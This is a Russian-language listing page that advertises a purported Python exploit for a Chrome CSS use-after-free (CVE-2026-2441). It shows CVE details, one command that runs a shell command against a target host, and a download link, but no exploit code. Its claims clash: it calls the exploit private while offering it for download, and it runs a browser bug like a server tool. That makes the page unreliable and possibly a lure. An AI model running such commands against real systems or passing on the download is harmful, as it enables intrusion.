Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-2441 — Эксплойт для CVE-2026-2441 — use-after-free в CSS-движке Google Chrome, позволяющий удалённое выполнение кода через специально созданные HTML-страницы. Включает Python-скрипт эксплойта для тестирования. | Kitploit
Инструменты/GitHubGitHub/netvanguard-cmd/cve-2026-2441
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложений
GitHubnetvanguard-cmd/cve-2026-2441

CVE-2026-2441

Эксплойт для CVE-2026-2441 — use-after-free в CSS-движке Google Chrome, позволяющий удалённое выполнение кода через специально созданные HTML-страницы. Включает Python-скрипт эксплойта для тестирования.

Репозиторий
6 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CSS в Google Chrome до удаленного выполнения кода (CVE-2026-2441)

Обзор

Выявлена уязвимость HIGH, классифицированная как CVE-2026-2441, отнесенная к категориям CWE-416, CWE-416, (CVSS 8.8). Использование после освобождения (Use after free) в CSS в Google Chrome до версии 145.0.7632.75 позволяло удаленному злоумышленнику выполнять произвольный код внутри песочницы (sandbox) с помощью специально созданной HTML-страницы. (Серьезность безопасности Chromium: High)

Детали

  • ID CVE: CVE-2026-2441
  • Обнаружено: 2026-02-13
  • Опубликовано: 2026-02-13
  • Воздействие: Конфиденциальность, Целостность, Доступность
  • Доступность эксплойта: Не публичный, только частный.

Описание уязвимости

Использование после освобождения (Use after free) в CSS в Google Chrome до версии 145.0.7632.75 позволяло удаленному злоумышленнику выполнять произвольный код внутри песочницы (sandbox) с помощью специально созданной HTML-страницы. (Серьезность безопасности Chromium: High)

Затронутые версии

Google Chrome:

  • до 145.0.7632.75
  • до 145.0.7632.76
  • Запуск

    Для запуска эксплойта требуется Python 3.9. Выполните:

    root@kitploit:~
    python exploit.py -h 10.10.10.10 -c 'uname -a'
    

    Контакты

    По вопросам обращайтесь по адресу [email protected]

    Эксплойт:

    Скачать здесь

    Скачать инструмент